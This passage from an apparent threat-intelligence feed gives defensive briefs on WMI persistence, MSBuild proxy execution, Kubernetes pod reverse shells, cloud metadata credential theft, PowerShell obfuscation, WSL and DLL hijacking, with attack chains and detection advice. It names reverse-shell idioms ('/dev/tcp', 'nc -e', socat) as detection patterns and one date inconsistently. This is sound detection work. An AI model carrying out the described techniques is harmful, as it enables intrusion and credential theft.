id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ewmic.exe\u003c/code\u003e to create a WMI event filter that defines a specific event to monitor.\u003c/li\u003e\n\u003cli\u003eA WMI event consumer, such as \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e, is created using \u003ccode\u003ewmic.exe\u003c/code\u003e specifying the malicious code or script to execute when the event occurs.\u003c/li\u003e\n\u003cli\u003eA WMI binding is established between the event filter and the event consumer using \u003ccode\u003ewmic.exe\u003c/code\u003e, linking the event to the action.\u003c/li\u003e\n\u003cli\u003eThe malicious WMI event subscription is activated, monitoring for the defined event.\u003c/li\u003e\n\u003cli\u003eWhen the specified event occurs, the WMI service triggers the execution of the associated malicious code or script through the event consumer.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to the system, as the WMI event subscription will re-activate after reboots.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform additional malicious activities, such as lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of WMI for persistence can allow an attacker to maintain long-term, unauthorized access to a compromised system. This can result in data theft, system compromise, and further malicious activities. While the exact number of victims is not specified in the source, the broad applicability of this technique means that many Windows systems are potentially at risk. If the attack succeeds, the attacker gains a foothold on the system that is difficult to detect and remove, which can lead to significant operational disruption and financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging and monitor for \u003ccode\u003ewmic.exe\u003c/code\u003e with command-line arguments related to creating event consumers, specifically \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e, to trigger the Sigma rule \u0026ldquo;Detect Suspicious WMIC Process\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect suspicious WMI event subscription creation.\u003c/li\u003e\n\u003cli\u003eReview the investigation steps outlined in the provided documentation to triage and analyze potential WMI persistence attempts.\u003c/li\u003e\n\u003cli\u003eMonitor Windows Security Event Logs and Sysmon for events related to WMI activity for broader coverage.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wmi-persistence/","summary":"Adversaries can leverage Windows Management Instrumentation (WMI) to establish persistence by creating event subscriptions that trigger malicious code execution when specific events occur, using tools like wmic.exe to create event consumers.","title":"Persistence via WMI Event Subscription","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-persistence/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel","CrowdStrike"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","msbuild","proxy-execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eThe Microsoft Build Engine (MSBuild) is a legitimate tool used by developers to build applications. However, adversaries are known to abuse MSBuild to execute malicious code, leveraging its trusted status to bypass security measures. This technique allows attackers to perform various actions on compromised systems while blending in with legitimate system activity. The observed behavior involves MSBuild being started by system processes like Explorer (explorer.exe) or Windows Management Instrumentation (WMI, wmiprvse.exe). Defenders should be aware of this unusual activity as it signifies a potential defense evasion tactic and unauthorized code execution within the targeted environment. This activity has been observed across environments leveraging Elastic Defend, Microsoft Defender XDR, SentinelOne Cloud Funnel, CrowdStrike, and standard Windows event logging.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through various means (e.g., phishing, exploitation of vulnerabilities).\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a script or payload that invokes MSBuild.exe.\u003c/li\u003e\n\u003cli\u003eThe script or payload is executed by a system process like explorer.exe or wmiprvse.exe, which is highly unusual for typical MSBuild usage.\u003c/li\u003e\n\u003cli\u003eMSBuild.exe starts with specific command-line arguments that dictate the build process, often involving malicious code.\u003c/li\u003e\n\u003cli\u003eThe malicious code is embedded within an MSBuild project file (.csproj or similar).\u003c/li\u003e\n\u003cli\u003eMSBuild.exe executes the malicious code as part of the build process.\u003c/li\u003e\n\u003cli\u003eThe executed code performs actions such as downloading additional payloads, modifying system configurations, or establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as gaining remote access, exfiltrating data, or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to a variety of negative outcomes, including unauthorized code execution, system compromise, data theft, and potentially complete system takeover. The use of MSBuild as a proxy execution method allows attackers to evade traditional security controls and blend in with legitimate system activities. This can result in delayed detection and increased dwell time, amplifying the potential damage. Since MSBuild is a trusted Microsoft utility, its abuse can make malicious activity harder to identify and respond to.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Microsoft Build Engine Started by a System Process\u0026rdquo; to your SIEM to detect instances of MSBuild.exe being launched by explorer.exe or wmiprvse.exe (see rules section).\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the full context of MSBuild.exe executions (reference setup instructions in the source URL).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of MSBuild.exe started by explorer.exe or wmiprvse.exe to determine if they are legitimate or malicious.\u003c/li\u003e\n\u003cli\u003eImplement enhanced monitoring and logging for MSBuild.exe and related processes to detect similar activities in the future, ensuring alerts are configured for rapid response.\u003c/li\u003e\n\u003cli\u003eReview and whitelist any legitimate scripts or administrative tools that leverage MSBuild for authorized tasks to reduce false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-msbuild-system-process/","summary":"Adversaries are leveraging MSBuild, a Microsoft Build Engine, to execute malicious code by initiating it from system processes such as Explorer or WMI to evade defenses and execute unauthorized actions.","title":"MSBuild Started by System Process for Defense Evasion and Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-msbuild-system-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["MSBuild"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","msbuild","masquerading"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may rename legitimate utilities, such as MSBuild, to evade detection, application allowlists, and other security protections. MSBuild, the Microsoft Build Engine, is a platform for building applications. Attackers can abuse MSBuild to proxy the execution of malicious code. The detection rule identifies instances where MSBuild is started after being renamed, indicating a potential attempt to evade detection. The rule focuses on identifying processes where the original file name is MSBuild.exe, but the process name is different, suggesting a renaming attempt.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system.\u003c/li\u003e\n\u003cli\u003eThe attacker renames the legitimate MSBuild.exe executable to a different name (e.g., evil.exe) to evade detection.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the renamed MSBuild executable (evil.exe) with a malicious project file (.csproj or similar).\u003c/li\u003e\n\u003cli\u003eMSBuild processes the project file, which contains commands or scripts to be executed.\u003c/li\u003e\n\u003cli\u003eThe malicious commands within the project file are executed by MSBuild, potentially downloading or executing further payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker may use MSBuild to execute PowerShell commands or other scripting languages for lateral movement or further exploitation.\u003c/li\u003e\n\u003cli\u003eMSBuild can be used to modify files, registry entries, or other system settings.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration or establishing persistence.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution, allowing attackers to install malware, steal sensitive information, or compromise the entire system. The renaming of MSBuild can bypass standard application allowlisting and detection mechanisms.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture the \u003ccode\u003eImage\u003c/code\u003e and \u003ccode\u003eOriginalFileName\u003c/code\u003e fields.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Microsoft Build Engine Using an Alternate Name\u0026rdquo; to your SIEM and tune for your environment to detect renamed MSBuild executables based on process metadata and command-line arguments.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for processes with \u003ccode\u003eOriginalFileName\u003c/code\u003e of \u0026ldquo;MSBuild.exe\u0026rdquo; and a different \u003ccode\u003eprocess.name\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of renamed executables, specifically those with an \u003ccode\u003eOriginalFileName\u003c/code\u003e of \u0026ldquo;MSBuild.exe.\u0026rdquo;\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-msbuild-renamed/","summary":"Attackers may rename the Microsoft Build Engine (MSBuild) executable to evade detection and proxy execution of malicious code.","title":"Microsoft Build Engine Executed After Renaming","url":"https://feed.craftedsignal.io/briefs/2024-01-03-msbuild-renamed/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Kubernetes"],"_cs_severities":["high"],"_cs_tags":["kubernetes","reverse_shell","execution","command_and_control"],"_cs_type":"advisory","_cs_vendors":["Elastic","Kubernetes"],"content_html":"\u003cp\u003eThis detection identifies attempts to establish reverse shells or bind shells within Kubernetes pods. The rule analyzes Kubernetes audit logs, specifically targeting \u003ccode\u003ekubectl exec\u003c/code\u003e commands where a user is attempting to execute commands inside a container. By decoding the URL-encoded command parameters and searching for known reverse shell patterns (e.g., usage of \u003ccode\u003e/dev/tcp\u003c/code\u003e, \u003ccode\u003enc -e\u003c/code\u003e, \u003ccode\u003esocat\u003c/code\u003e), the rule aims to detect unauthorized interactive access and command-and-control activity originating from compromised pods. This activity is often indicative of post-exploitation behavior, where an attacker seeks to gain persistent access to the Kubernetes cluster. The rule is based on the Elastic detection rule released on 2026-04-23. It is critical to investigate these alerts promptly, as successful reverse shell establishment can lead to data exfiltration, lateral movement within the cluster, and further compromise of sensitive resources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Kubernetes cluster, potentially through a vulnerability in an application running within a pod, or by compromising a user\u0026rsquo;s credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e to execute a command within a target pod. The command is embedded within the \u003ccode\u003erequestURI\u003c/code\u003e parameter, URL-encoded to evade basic detection.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003erequestURI\u003c/code\u003e includes the \u003ccode\u003ecommand=\u003c/code\u003e parameter, followed by a string containing shell commands designed to initiate a reverse or bind shell.\u003c/li\u003e\n\u003cli\u003eThe malicious command utilizes utilities such as \u003ccode\u003enc\u003c/code\u003e, \u003ccode\u003esocat\u003c/code\u003e, or \u003ccode\u003ebash\u003c/code\u003e with redirection to \u003ccode\u003e/dev/tcp\u003c/code\u003e to establish a network connection back to the attacker\u0026rsquo;s controlled machine.\u003c/li\u003e\n\u003cli\u003eThe reverse shell connects back to the attacker, providing interactive command execution within the compromised pod.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the reverse shell to perform reconnaissance, discover sensitive information, and potentially escalate privileges within the pod.\u003c/li\u003e\n\u003cli\u003eThe attacker might attempt to move laterally to other pods or nodes within the cluster, leveraging stolen credentials or exploiting further vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, which may include data exfiltration, deployment of malicious containers, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful reverse shell attack within a Kubernetes cluster can have severe consequences. Attackers can gain unauthorized access to sensitive data, compromise critical applications, and disrupt services. Lateral movement within the cluster can lead to widespread compromise, potentially affecting numerous pods and nodes. The lack of proper monitoring and alerting for \u003ccode\u003ekubectl exec\u003c/code\u003e commands can allow attackers to operate undetected for extended periods, increasing the potential for significant damage. The financial impact can range from tens of thousands to millions of dollars, depending on the severity of the breach and the value of the compromised data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Kubernetes Pod Exec Potential Reverse Shell\u0026rdquo; Sigma rule to your SIEM and tune for your environment to detect malicious \u003ccode\u003ekubectl exec\u003c/code\u003e commands.\u003c/li\u003e\n\u003cli\u003eEnable Kubernetes audit logging to capture \u003ccode\u003ekubectl exec\u003c/code\u003e events and ensure that the audit logs are ingested into your SIEM.\u003c/li\u003e\n\u003cli\u003eImplement network policies to restrict outbound connections from pods, limiting the ability of attackers to establish reverse shells.\u003c/li\u003e\n\u003cli\u003eMonitor Kubernetes audit logs for suspicious user activity, such as unusual API calls or access to sensitive resources.\u003c/li\u003e\n\u003cli\u003eRegularly review and update RBAC (Role-Based Access Control) policies to minimize the privileges assigned to users and service accounts, reducing the attack surface.\u003c/li\u003e\n\u003cli\u003eImplement the provided regex pattern in the Sigma rule within your existing detection logic, ensuring adequate coverage of reverse shell attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-kubernetes-pod-exec-reverse-shell/","summary":"This rule flags potential reverse shell activity via kubectl exec commands in Kubernetes pods by detecting specific shell and socket idioms within URL-decoded command payloads in Kubernetes audit logs, indicating post-exploitation interactive access and command-and-control.","title":"Kubernetes Pod Exec Potential Reverse Shell Activity Detected","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-pod-exec-reverse-shell/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AWS IMDS","GCP Compute Metadata","Azure IMDS"],"_cs_severities":["high"],"_cs_tags":["kubernetes","cloud","credential_access","execution"],"_cs_type":"advisory","_cs_vendors":["AWS","Google","Azure"],"content_html":"\u003cp\u003eThis alert focuses on detecting Kubernetes pod exec sessions that attempt to access cloud instance metadata endpoints. The activity is flagged when the decoded command line of a pod exec session contains references to cloud instance metadata services across AWS, GCP, and Azure. Attackers may exploit this to harvest role credentials, tokens, or instance attributes from the underlying node or hypervisor. This is a high-risk behavior because it can expose short-lived cloud credentials to code running inside a container, particularly concerning in multi-tenant and regulated environments. This detection classifies the cloud target and whether the command indicates credential theft or reconnaissance.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a Kubernetes cluster.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a vulnerable pod within the cluster.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e to gain shell access to the pod.\u003c/li\u003e\n\u003cli\u003eInside the pod, the attacker crafts a command-line request targeting the cloud instance metadata service (IMDS) endpoint.\u003c/li\u003e\n\u003cli\u003eThe command, often using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e, attempts to retrieve sensitive information such as IAM roles, tokens, or instance attributes.\u003c/li\u003e\n\u003cli\u003eThe IMDS responds with the requested data, which may include credentials or configuration details.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates the stolen credentials or uses them to escalate privileges within the cloud environment.\u003c/li\u003e\n\u003cli\u003eAttacker uses the harvested credentials to move laterally, compromise other cloud resources, or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised credentials can lead to unauthorized access to sensitive data, lateral movement within the cloud environment, and potential data exfiltration. A successful attack could impact multiple organizations sharing the same Kubernetes cluster. The impact could include financial losses, reputational damage, and regulatory fines, depending on the type of data compromised and the extent of the breach.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eKubernetes Pod Exec IMDS Access\u003c/code\u003e to detect suspicious command-line activity within Kubernetes pods.\u003c/li\u003e\n\u003cli\u003eBlock access to the cloud instance metadata endpoints (169.254.169.254) from within Kubernetes pods using network policies.\u003c/li\u003e\n\u003cli\u003eRegularly review and tighten RBAC permissions related to \u003ccode\u003epods/exec\u003c/code\u003e to limit the ability of attackers to gain shell access.\u003c/li\u003e\n\u003cli\u003eMonitor cloud audit logs for suspicious STS or token issuance events correlated with Kubernetes pod exec events.\u003c/li\u003e\n\u003cli\u003eImplement workload identity solutions to avoid the need to expose instance metadata to pods.\u003c/li\u003e\n\u003cli\u003eBaseline approved images and tune exclusions narrowly to avoid false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-kubernetes-metadata-access/","summary":"Detection of Kubernetes pod exec sessions accessing cloud instance metadata endpoints, indicating potential credential theft from AWS, GCP, or Azure.","title":"Kubernetes Pod Exec Cloud Instance Metadata Access","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-metadata-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","powershell","obfuscation"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers leverage Invoke-Obfuscation, a popular PowerShell obfuscation framework, to generate highly obfuscated IEX (Invoke-Expression) commands. This technique allows them to bypass traditional signature-based detections and execute malicious payloads on targeted systems. Invoke-Obfuscation is designed to make PowerShell code difficult to read and analyze, thus hindering security analysts and automated detection systems. The obfuscation techniques include string concatenation using environment variables, character code manipulation, and other methods to mask the true intent of the script. This activity has been observed across various campaigns, typically targeting Windows environments where PowerShell is widely used. Defenders should be aware of this technique and implement robust detection mechanisms to identify and block obfuscated PowerShell execution.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: An attacker gains initial access to the target system through methods such as phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003ePayload Delivery: The attacker uploads a malicious PowerShell script or downloads it from a remote server.\u003c/li\u003e\n\u003cli\u003eObfuscation: The attacker uses Invoke-Obfuscation to obfuscate the PowerShell script, making it difficult to analyze. This can involve techniques like string concatenation using \u003ccode\u003e$PSHome\u003c/code\u003e or \u003ccode\u003e$ShellId\u003c/code\u003e, or using complex variable manipulations.\u003c/li\u003e\n\u003cli\u003eExecution: The attacker executes the obfuscated PowerShell script using \u003ccode\u003epowershell.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eIEX Invocation: The obfuscated script leverages \u003ccode\u003eIEX\u003c/code\u003e (Invoke-Expression) to dynamically execute code, further hindering detection. The obfuscated strings are deobfuscated at runtime within the IEX context.\u003c/li\u003e\n\u003cli\u003ePersistence (Optional): The attacker may establish persistence by creating scheduled tasks or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eLateral Movement (Optional): The attacker may use the compromised system as a launching point for lateral movement within the network, using tools like \u003ccode\u003ePsExec\u003c/code\u003e or \u003ccode\u003eWinRM\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eObjective: The ultimate objective could be data exfiltration, ransomware deployment, or establishing a long-term foothold for espionage.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code on the compromised system, leading to various malicious activities such as data theft, system compromise, and ransomware deployment. The use of Invoke-Obfuscation makes detection more challenging, potentially allowing attackers to remain undetected for extended periods. This can result in significant financial losses, reputational damage, and operational disruption.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eInvoke-Obfuscation Obfuscated IEX Invocation\u003c/code\u003e to your SIEM to detect obfuscated IEX commands generated by Invoke-Obfuscation.\u003c/li\u003e\n\u003cli\u003eMonitor PowerShell execution logs for suspicious command-line arguments that resemble obfuscation patterns described in the Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement PowerShell Constrained Language Mode to restrict the capabilities of PowerShell and limit the effectiveness of obfuscation techniques.\u003c/li\u003e\n\u003cli\u003eEnable and review PowerShell Script Block Logging to capture the content of executed scripts, allowing for more in-depth analysis of malicious activity.\u003c/li\u003e\n\u003cli\u003eRegularly update your endpoint detection and response (EDR) solutions to ensure they have the latest signatures and behavioral detection capabilities.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of phishing and other social engineering attacks that may be used to deliver malicious PowerShell scripts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-invoke-obfuscation-iex/","summary":"Attackers use Invoke-Obfuscation, a PowerShell obfuscation framework, to generate obfuscated IEX (Invoke-Expression) commands, evading detection and executing malicious code.","title":"Invoke-Obfuscation Obfuscated IEX Invocation via PowerShell","url":"https://feed.craftedsignal.io/briefs/2024-01-invoke-obfuscation-iex/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Windows Subsystem for Linux","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","windows","wsl"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis rule detects attempts to execute programs on the host from the Windows Subsystem for Linux (WSL). Adversaries may enable and use WSL for Linux to avoid detection by executing malicious scripts or binaries, bypassing traditional Windows security mechanisms. The rule identifies suspicious executions initiated by WSL processes, excluding known safe executables, to flag potential misuse for defense evasion. This detection focuses on identifying when a process is spawned by \u003ccode\u003ewsl.exe\u003c/code\u003e or \u003ccode\u003ewslhost.exe\u003c/code\u003e and is not within a known good path. The rule is designed to work with data from Elastic Defend, Crowdstrike, Microsoft Defender XDR, SentinelOne Cloud Funnel, Sysmon, and Windows Security Event Logs.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system.\u003c/li\u003e\n\u003cli\u003eThe attacker enables the Windows Subsystem for Linux (WSL).\u003c/li\u003e\n\u003cli\u003eThe attacker transfers or creates malicious scripts or binaries within the WSL environment.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the malicious script or binary using a Linux shell within WSL, such as bash.\u003c/li\u003e\n\u003cli\u003eThe WSL environment interacts with the Windows host to execute commands or access resources.\u003c/li\u003e\n\u003cli\u003eThe executed commands perform malicious actions, such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages WSL\u0026rsquo;s integration with Windows to evade traditional Windows-based security measures.\u003c/li\u003e\n\u003cli\u003eThe final objective is to compromise the system or network while remaining undetected.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows adversaries to execute malicious code while potentially evading traditional Windows-based security measures. This can lead to system compromise, data theft, or further propagation of malware within the network. The rule\u0026rsquo;s \u003ccode\u003emedium\u003c/code\u003e severity reflects the potential for significant impact, necessitating prompt investigation and response.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eExecution via Windows Subsystem for Linux\u003c/code\u003e to your SIEM to detect potential malicious activity originating from WSL.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) or Windows process creation logs to provide the necessary data for the Sigma rule to function.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on identifying the executed process, parent process (\u003ccode\u003ewsl.exe\u003c/code\u003e or \u003ccode\u003ewslhost.exe\u003c/code\u003e), and associated user account.\u003c/li\u003e\n\u003cli\u003eCorrelate alerts with other security events from Microsoft Defender XDR, SentinelOne, or Crowdstrike to identify related suspicious activities or patterns.\u003c/li\u003e\n\u003cli\u003eImplement exceptions for known administrative scripts or development tools that are frequently executed via WSL to reduce false positives, as outlined in the rule\u0026rsquo;s analysis.\u003c/li\u003e\n\u003cli\u003eMonitor the WSL configuration and installed Linux distributions on affected systems to identify unauthorized changes or installations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wsl-child-process-execution/","summary":"This detection identifies attempts to execute programs from the Windows Subsystem for Linux (WSL) to evade detection by flagging suspicious executions initiated by WSL processes and excluding known safe executables.","title":"Execution via Windows Subsystem for Linux","url":"https://feed.craftedsignal.io/briefs/2024-01-wsl-child-process-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["M365 Defender","Elastic Defend","CrowdStrike FDR","SentinelOne Cloud Funnel","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","dll-hijacking"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","SentinelOne","Elastic"],"content_html":"\u003cp\u003eThis detection identifies potential abuse of the Windows Side-by-Side (SxS) feature to execute malicious code. Attackers can place a malicious DLL file within an application\u0026rsquo;s local SxS folder (application.exe.local) and trick the Windows module loader into prioritizing it over legitimate system DLLs. This technique, known as DLL hijacking or DLL redirection, allows adversaries to gain arbitrary code execution within the context of the targeted application. This technique may be used to bypass security controls, escalate privileges, or establish persistence. The detection focuses on file events related to DLLs within these specific SxS folders.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a legitimate application with an associated SxS folder (application.exe.local).\u003c/li\u003e\n\u003cli\u003eThe attacker creates or modifies a malicious DLL file.\u003c/li\u003e\n\u003cli\u003eThe attacker places the malicious DLL file in the application\u0026rsquo;s SxS folder (application.exe.local).\u003c/li\u003e\n\u003cli\u003eA legitimate application attempts to load a DLL.\u003c/li\u003e\n\u003cli\u003eDue to the presence of the malicious DLL in the SxS folder, the Windows module loader prioritizes the attacker\u0026rsquo;s DLL.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL is loaded and executed by the application.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves code execution within the context of the application.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution within the targeted application\u0026rsquo;s context. This can result in privilege escalation, data theft, system compromise, or the establishment of persistence mechanisms. While the number of directly affected organizations is unknown, this technique can be used against a wide range of applications on Windows systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor file creation events for DLL files in \u003ccode\u003eC:\\*\\*.exe.local\\*.dll\u003c/code\u003e and \u003ccode\u003e\\\\Device\\\\HarddiskVolume*\\\\*\\\\*.exe.local\\\\*.dll\u003c/code\u003e using the provided Sigma rule to detect potential malicious DLL planting.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 11 (File Create) to improve visibility into file creation events, as noted in the \u003ca href=\"https://ela.st/sysmon-event-11-setup\"\u003esetup instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine the legitimacy of the DLL creation event and the involved application.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-local-sxs-dll-execution/","summary":"This rule detects the creation, modification, or deletion of DLL files within Windows SxS local folders, which could indicate an attempt to execute malicious payloads by abusing shared module loading.","title":"Execution via Local SxS Shared Module","url":"https://feed.craftedsignal.io/briefs/2024-01-03-local-sxs-dll-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["execution","windows","scripting","threat-detection"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies a common attack vector where adversaries download and execute malicious scripts on Windows systems. The rule focuses on detecting scripts (e.g., .js, .vbs, .ps1, .msi) that originate from internet sources (identified by the presence of \u003ccode\u003efile.origin_url\u003c/code\u003e or \u003ccode\u003efile.origin_referrer_url\u003c/code\u003e ) and are subsequently executed using scripting utilities. The rule specifically looks for file creations by web browsers and archive utilities (chrome.exe, msedge.exe, winrar.exe, 7zFM.exe, etc.) 